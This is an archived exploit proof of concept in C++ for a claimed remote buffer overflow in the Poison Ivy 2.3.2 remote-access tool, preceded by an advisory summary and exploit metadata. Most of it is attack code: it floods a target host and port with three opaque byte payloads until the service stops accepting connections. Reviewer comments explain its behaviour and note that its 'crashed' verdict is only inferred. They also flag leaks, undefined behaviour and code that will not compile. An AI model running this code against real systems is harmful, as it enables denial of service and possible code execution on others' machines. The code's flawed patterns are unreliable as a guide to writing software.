// source: https://www.securityfocus.com/bid/48039/info

Poison Ivy is prone to an unspecified buffer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Poison Ivy 2.3.2 is vulnerable; other versions may also be affected.

# Exploit Title: Poison Ivy 2.3.2 (Latest version) remote buffer overflow
# Google Dork: No dorks.
# Date: 27/05/11
# Author: Kevin R.V <kevin.nullbyte@gmail.com>
# Software Link: http://www.poisonivy-rat.com/dl.php?file=PI232
# Version: 2.3.2
# Tested on: Windows XP SP2
# CVE : No exist.

/* Poison Ivy 2.3.2 Remote Buffer Overflow
 * Author: Kevin R.V <kevin.nullbyte@gmail.com>
 * Date: 2011
 * License: Totally free 8-)
 *
 * Reviewer summary (what the code below actually does):
 *   - opens a TCP connection to <ip>:<port>, sends three fixed byte arrays
 *     99 times each, then reconnects and repeats (via recursion in PoC);
 *   - stops only when a connect() fails, and at that point reports
 *     "crashed" if any earlier connect() had succeeded.
 *   The program never inspects anything the remote side sends back, so the
 *   "crashed" verdict is an inference from a refused connection, not a
 *   confirmation that the listener was Poison Ivy or that it faulted.
 *   The header text above this comment is not valid C++ and must be
 *   stripped before the file compiles; it is kept here as archived.
 */

#include <iostream>
#include <winsock2.h>   // Windows-only: WSAStartup, SOCKET, sendto, inet_addr

#define VERS "0.1"      // concatenated into the banner string literal in main()

// Set to 1 once any connect() has succeeded; static storage, so it starts at 0.
// Read in PoC() to choose between the "crashed" and "not detected" messages.
int connected;

using namespace std;    // NOTE(review): file-scope using-directive; style only

// Three opaque byte arrays sent verbatim to the target. Their meaning to the
// remote service is not documented on this page. Note that values above 0x7f
// are being list-initialised into `char`; where char is signed this is a
// narrowing conversion that C++11-and-later compilers reject in brace
// initialisation (older compilers truncate silently).
char payload[] = {
    0xb2, 0xa8, 0xc3, 0x17, 0x1c, 0x1b, 0x99, 0xb9, 0x4c, 0xab, 0x8b, 0x88, 0x3a, 0x20, 0x13, 0xb3,
    0x72, 0x0e, 0x57, 0xbc, 0x9f, 0x81, 0xb9, 0x08, 0x61, 0x30, 0x87, 0x74, 0xea, 0x65, 0xb5, 0x4a,
    0xc9, 0xfc, 0x87, 0xe3, 0x95, 0x9e, 0xcd, 0xcd, 0x40, 0x98, 0xd2, 0x1f, 0x31, 0xee, 0x96, 0x83,
    0x3d, 0x0a, 0xfe, 0xb8, 0x9b, 0xf2, 0xe7, 0x10, 0x23, 0x64, 0xfe, 0xe9, 0x10, 0xc4, 0x9c, 0xf7,
    0x29, 0xe5, 0x6b, 0xe3, 0x54, 0xbb, 0x18, 0x8b, 0x07, 0x81, 0x92, 0x5e, 0xbb, 0x35, 0x6f, 0xe4,
    0x23, 0x4a, 0x0c, 0xd0, 0x1f, 0x3b, 0xd4, 0x9a, 0x5c, 0x94, 0xad, 0x8b, 0xed, 0xa4, 0xed, 0xb2,
    0x14, 0x23, 0x04, 0xa5, 0xfd, 0x8e, 0x8c, 0x9b, 0xc8, 0x0f, 0x78, 0xbf, 0xf2, 0xe4, 0xfe, 0x28,
    0xe9, 0x3c, 0x5d, 0x86, 0x16, 0xff, 0x59, 0x7d, 0x70, 0x6d, 0x18, 0x2d, 0xdf, 0x28, 0x66, 0x02,
    0xde, 0xca, 0x20, 0xe6, 0xfd, 0xe7, 0xbf, 0x4d, 0xe8, 0x8c, 0x69, 0xdd, 0x40, 0x22, 0x8f, 0x2f,
    0x55, 0x54, 0xb1, 0x60, 0x86, 0x29, 0xd0, 0x3d, 0xc7, 0x01, 0xb5, 0xdc, 0xbf, 0x63, 0x28, 0xd2,
    0x4e, 0xe6, 0x29, 0xed, 0x5c, 0xee, 0x17, 0x53, 0xe1, 0x11, 0x5c, 0x61, 0x9b, 0xb0, 0xfc, 0x71,
    0x6e, 0x46, 0xa9, 0x27, 0xa8, 0x21, 0x05, 0x67, 0x86, 0x24, 0x86, 0x01, 0xb8, 0xd7, 0x65, 0x11,
    0x36, 0xe5, 0x16, 0x05, 0xdc, 0x8c, 0x7c, 0xa7, 0xb9, 0xee, 0xbe, 0xa6, 0xcf, 0x88, 0x67, 0x56,
    0xaa, 0x61, 0xe3, 0x2c, 0x72, 0xbf, 0x5b, 0xee, 0x18, 0xc4, 0x65, 0x2c, 0x4a, 0x0d, 0x88, 0x2e,
    0xad, 0x96, 0x67, 0xab, 0xc1, 0xb1, 0x95, 0x03, 0x36, 0xc8, 0x04, 0xbf, 0xe8, 0x29, 0x5a, 0xf5,
    0x83, 0xe5, 0x5f, 0xe4, 0x0e, 0xe2, 0x6f, 0x6b, 0x93, 0x80, 0xe7, 0x25, 0xca, 0x44, 0xa8, 0x48
};

char payload2[] = {
    0xc6, 0xa7, 0x53, 0xce, 0xdc, 0x1c, 0xdc, 0x74, 0x9a, 0xc7, 0x31, 0xdf, 0x2a, 0x21, 0x5f, 0x0e,
    0x7e, 0xe6, 0x1e, 0xa1, 0xb5, 0x17, 0xc4, 0x9f, 0x4a, 0x7a, 0x81, 0xde, 0x90, 0x13, 0x37, 0x2d,
    0x62, 0x3c, 0xb6, 0x10, 0x2d, 0x44, 0x57, 0xa2, 0xa0, 0xdd, 0xcb, 0x90, 0xd3, 0x83, 0x1a, 0xda,
    0x89, 0x97, 0x68, 0x61, 0xce, 0x38, 0xc1, 0xc4, 0xe8, 0xb0, 0xfa, 0x0b, 0x64, 0x12, 0x73, 0xf0,
    0x28, 0x24, 0x2b, 0x51, 0x78, 0x15, 0xfa, 0x27, 0xcc, 0xc7, 0x5c, 0x5c, 0x3a, 0xf8, 0xea, 0x5e,
    0xd9, 0x6e, 0xd4, 0x96, 0xa0, 0x8d, 0x99, 0x13, 0x84, 0x99, 0xff, 0xba, 0x41, 0xed, 0xf3, 0x1c,
    0x67, 0xb6, 0xaa, 0x5a, 0x95, 0xfd, 0x92, 0x23, 0x9a, 0x72, 0x86, 0xcd, 0xf6, 0xa1, 0xb9, 0x44,
    0xbc, 0x15, 0xc3, 0xac, 0xaa, 0xd6, 0x65, 0xf1, 0x08, 0x19, 0xf5, 0x2a, 0x62, 0xe4, 0x0d, 0x4e,
    0x14, 0x1f, 0x21, 0x4d, 0x0c, 0x22, 0x06, 0x98, 0x84, 0x74, 0xf7, 0xaa, 0x18, 0x90, 0xd7, 0xe5,
    0x2d, 0x04, 0x45, 0xb4, 0x2f, 0xbc, 0xdc, 0x97, 0xd2, 0x9b, 0x25, 0xe5, 0x4d, 0xb3, 0x51, 0x5f,
    0x1a, 0x93, 0xe4, 0x97, 0x51, 0xc7, 0xd9, 0x81, 0x52, 0xee, 0x11, 0x83, 0x51, 0xb1, 0xd5, 0x34,
    0x6f, 0xf1, 0xea, 0x9e, 0xbf, 0x4b, 0x6e, 0x33, 0x0d, 0x8a, 0x73, 0x15, 0xb9, 0xde, 0x92, 0x53,
    0xd3, 0xfd, 0x5a, 0xcf, 0x69, 0xde, 0x19, 0x29, 0x05, 0xa1, 0x50, 0x78, 0x14, 0x81, 0xe5, 0xf1,
    0x74, 0xea, 0x8c, 0x82, 0x58, 0x93, 0x74, 0x4f, 0x5a, 0x77, 0xb5, 0xde, 0x17, 0xd1, 0x48, 0x44,
    0x1b, 0x1f, 0x32, 0x30, 0x9f, 0x64, 0x7c, 0x22, 0x4e, 0xd4, 0x1a, 0xae, 0x77, 0x01, 0x2b, 0x1f
};

char payload3[] = {
    0xe0, 0xf5, 0x3d, 0xc1, 0xf0, 0xea, 0x15, 0xdb, 0x43, 0x3e, 0x65, 0xf8, 0x9b, 0xe2, 0x14, 0xba,
    0x90, 0x48, 0x5c, 0xd5, 0xec, 0x70, 0xa3, 0x8b, 0x41, 0x72, 0x28, 0x50, 0xec, 0xf6, 0xd5, 0x2a,
    0xe6, 0x06, 0x46, 0xb2, 0xc5, 0x0c, 0x96, 0x6a, 0x69, 0x86, 0x6b, 0x12, 0xe4, 0x93, 0xe5, 0x11
};

// Connects to host:port over TCP and, while connect() keeps succeeding, sends
// payload, payload2 and payload3 99 times each per connection, then calls
// itself to reconnect. Prints a verdict once a connect() fails.
//
// host: dotted-quad IPv4 string handed to inet_addr(); not validated here.
// port: host-order TCP port, converted with htons().
//
// Declared `int` but has no return statement, so control falling off the end
// is undefined behaviour in C++; callers ignore the value anyway.
//
// Resource handling (reviewer notes, all visible in the body):
//   - WSAStartup() is called again on every recursive call; WSACleanup() never.
//   - socket() and sendto() return values are never checked.
//   - the SOCKET is never closed, and each successful connection adds another
//     stack frame, so a long-lived target leaks one socket per iteration and
//     eventually exhausts the stack rather than terminating cleanly.
//   - sendto() is used on a connected stream socket; the address arguments are
//     redundant with the earlier connect().
int PoC(char * host, unsigned int port)
{
    WSADATA wsa;
    WSAStartup(MAKEWORD(2,0),&wsa);
    SOCKET sock;
    struct sockaddr_in local;
    sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    local.sin_family = AF_INET;
    local.sin_addr.s_addr = inet_addr(host);
    local.sin_port = htons(port);
    if (connect(sock, (struct sockaddr *)&local, sizeof(local) ) == 0 )
    {
        connected = 1;      // remembered across recursion via the global
        cout << ".";        // one dot per successful connection
        // 99 iterations x 3 sends = 297 sendto() calls on this connection
        for(long int i = 0; i<99; i++)
        {
            sendto(sock, payload, sizeof(payload), 0, (struct sockaddr *)&local,sizeof(local));
            sendto(sock, payload2, sizeof(payload2), 0, (struct sockaddr *)&local,sizeof(local));
            sendto(sock, payload3, sizeof(payload3), 0, (struct sockaddr *)&local,sizeof(local));
        }
        PoC(host, port);    // reconnect; recursion ends only when connect() fails
    }
    else
    {
        // A refused connection after an earlier success is treated as a crash.
        // Nothing received from the peer is examined, so this is an inference:
        // a restart, a firewall rule or a service that simply stopped listening
        // would produce the same output.
        if ( connected )
            cout << endl << endl << "[+] Congrats, poison-ivy crashed!!" << endl;
        else
            cout << endl << endl << "[-] Sorry not poison ivy detected 8-(" << endl;
    }
}

// Entry point: prints a banner, parses `-h <ip>` and `-p <port>` from argv,
// then hands them to PoC(). Returns 1 unconditionally (a non-zero status to
// the shell even on the intended path).
//
// Argument parsing notes (reviewer):
//   - `! strcmp(a, b) != 0` parses as `(!strcmp(a, b)) != 0`, i.e. true when
//     the strings are equal, so the flags are matched as intended.
//   - the loop reads argv[i+1] without checking i+1 < argc; if "-h" or "-p"
//     is the last argument, argv[argc] (a null pointer) is passed on.
//   - `ip` and `port` are left uninitialised when their flag is absent; the
//     argc < 2 guard only rejects a bare invocation.
int main(int argc, char *argv[])
{
    cout << "Poison-ivy remote buffer overflow " VERS << endl << endl;
    cout << "by Kevin R.V <kevin.nullbyte@gmail.com" << endl;
    if ( argc < 2 )
    {
        // ".exe" is appended to whatever argv[0] contains
        cout << "Usage: " << argv[0] << ".exe -h <ip> -p <port>" << endl << endl;
        exit(-1);
    }
    u_short port;
    char * ip;
    for(int i = 0; i<argc; i++)
    {
        if( ! strcmp(argv[i], "-h") != 0 )
            ip = argv[i+1];
        else if( ! strcmp(argv[i], "-p") != 0 )
            port = atoi(argv[i+1]);     // no range check; atoi on a non-number yields 0
    }
    cout << "[+] Starting exploit" << endl << endl;
    PoC(ip, port);
    return 1;
}